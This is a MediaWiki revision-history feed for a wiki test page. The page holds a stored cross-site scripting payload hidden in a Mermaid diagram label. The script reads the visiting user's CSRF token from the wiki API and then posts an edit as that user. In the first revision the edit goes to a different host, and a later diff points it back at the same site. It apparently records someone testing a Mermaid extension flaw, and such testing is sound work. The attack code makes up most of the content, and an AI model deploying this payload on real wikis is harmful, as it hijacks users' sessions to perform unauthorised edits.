 <?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-GB">
	<id>https://cheekyfactor.com/index.php?action=history&amp;feed=atom&amp;title=Mermaid%3ATest_page2</id>
	<title>Mermaid:Test page2 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://cheekyfactor.com/index.php?action=history&amp;feed=atom&amp;title=Mermaid%3ATest_page2"/>
	<link rel="alternate" type="text/html" href="https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&amp;action=history"/>
	<updated>2026-04-20T00:18:22Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.39.5</generator>
	<entry>
		<id>https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&amp;diff=245&amp;oldid=prev</id>
		<title>Garyf at 17:24, 5 December 2023</title>
		<link rel="alternate" type="text/html" href="https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&amp;diff=245&amp;oldid=prev"/>
		<updated>2023-12-05T17:24:19Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en-GB&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 17:24, 5 December 2023&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l16&quot;&gt;Line 16:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 16:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;         console.log(&amp;quot;Visit the new page at https://cheekyfactor.com/index.php/&amp;quot;+page_title);&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;         console.log(&amp;quot;Visit the new page at https://cheekyfactor.com/index.php/&amp;quot;+page_title);&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     };&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     };&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;−&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.open(&amp;quot;POST&amp;quot;, &amp;quot;https://&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;thekings&lt;/del&gt;.&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;house&lt;/del&gt;/api.php&amp;quot;);&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.open(&amp;quot;POST&amp;quot;, &amp;quot;https://&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;cheekyfactor&lt;/ins&gt;.&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;com&lt;/ins&gt;/api.php&amp;quot;);&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.setRequestHeader(&amp;#039;Content-type&amp;#039;, &amp;#039;application/x-www-form-urlencoded&amp;#039;);&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.setRequestHeader(&amp;#039;Content-type&amp;#039;, &amp;#039;application/x-www-form-urlencoded&amp;#039;);&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.send(&amp;quot;action=edit&amp;amp;format=jsonfm&amp;amp;wrappedhtml=1&amp;amp;title=&amp;quot;+page_title+&amp;quot;&amp;amp;text=a%20new%20page%20via%20API&amp;amp;token=&amp;quot;+encodeURIComponent(csrf_token));&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     x2.send(&amp;quot;action=edit&amp;amp;format=jsonfm&amp;amp;wrappedhtml=1&amp;amp;title=&amp;quot;+page_title+&amp;quot;&amp;amp;text=a%20new%20page%20via%20API&amp;amp;token=&amp;quot;+encodeURIComponent(csrf_token));&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Garyf</name></author>
	</entry>
	<entry>
		<id>https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&amp;diff=244&amp;oldid=prev</id>
		<title>Garyf: Created page with &quot;sequenceDiagram participant Alice &lt;u&gt;test&lt;/u&gt;&lt;script&gt; x=new XMLHttpRequest(); page_title = &quot;XSS_Page_&quot;+(new Date().getTime());  x.onload=function(){     console.log(this.responseText);     resp = JSON.parse(this.responseText);     csrf_token = resp[&#039;query&#039;][&#039;tokens&#039;][&#039;csrftoken&#039;];     console.log(&quot;CSRF Token: &quot;, csrf_token);     // now make a request on behalf of the user         x2 = new XMLHttpRequest();     x2.onload=function(){         console.log(this.responseText);...&quot;</title>
		<link rel="alternate" type="text/html" href="https://cheekyfactor.com/index.php?title=Mermaid:Test_page2&amp;diff=244&amp;oldid=prev"/>
		<updated>2023-12-05T17:18:34Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;sequenceDiagram participant Alice &amp;lt;u&amp;gt;test&amp;lt;/u&amp;gt;&amp;lt;script&amp;gt; x=new XMLHttpRequest(); page_title = &amp;quot;XSS_Page_&amp;quot;+(new Date().getTime());  x.onload=function(){     console.log(this.responseText);     resp = JSON.parse(this.responseText);     csrf_token = resp[&amp;#039;query&amp;#039;][&amp;#039;tokens&amp;#039;][&amp;#039;csrftoken&amp;#039;];     console.log(&amp;quot;CSRF Token: &amp;quot;, csrf_token);     // now make a request on behalf of the user         x2 = new XMLHttpRequest();     x2.onload=function(){         console.log(this.responseText);...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;sequenceDiagram&lt;br /&gt;
participant Alice &amp;lt;u&amp;gt;test&amp;lt;/u&amp;gt;&amp;lt;script&amp;gt;&lt;br /&gt;
x=new XMLHttpRequest();&lt;br /&gt;
page_title = &amp;quot;XSS_Page_&amp;quot;+(new Date().getTime());&lt;br /&gt;
&lt;br /&gt;
x.onload=function(){&lt;br /&gt;
    console.log(this.responseText);&lt;br /&gt;
    resp = JSON.parse(this.responseText);&lt;br /&gt;
    csrf_token = resp[&amp;#039;query&amp;#039;][&amp;#039;tokens&amp;#039;][&amp;#039;csrftoken&amp;#039;];&lt;br /&gt;
    console.log(&amp;quot;CSRF Token: &amp;quot;, csrf_token);&lt;br /&gt;
    // now make a request on behalf of the user&lt;br /&gt;
   &lt;br /&gt;
    x2 = new XMLHttpRequest();&lt;br /&gt;
    x2.onload=function(){&lt;br /&gt;
        console.log(this.responseText);&lt;br /&gt;
        console.log(&amp;quot;Visit the new page at https://cheekyfactor.com/index.php/&amp;quot;+page_title);&lt;br /&gt;
    };&lt;br /&gt;
    x2.open(&amp;quot;POST&amp;quot;, &amp;quot;https://thekings.house/api.php&amp;quot;);&lt;br /&gt;
    x2.setRequestHeader(&amp;#039;Content-type&amp;#039;, &amp;#039;application/x-www-form-urlencoded&amp;#039;);&lt;br /&gt;
    x2.send(&amp;quot;action=edit&amp;amp;format=jsonfm&amp;amp;wrappedhtml=1&amp;amp;title=&amp;quot;+page_title+&amp;quot;&amp;amp;text=a%20new%20page%20via%20API&amp;amp;token=&amp;quot;+encodeURIComponent(csrf_token));&lt;br /&gt;
};&lt;br /&gt;
x.open(&amp;quot;POST&amp;quot;,&amp;quot;https://cheekyfactor.com/api.php?action=query&amp;amp;format=json&amp;amp;meta=tokens&amp;amp;type=csrf&amp;quot;);&lt;br /&gt;
x.send();&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;/div&gt;</summary>
		<author><name>Garyf</name></author>
	</entry>
</feed>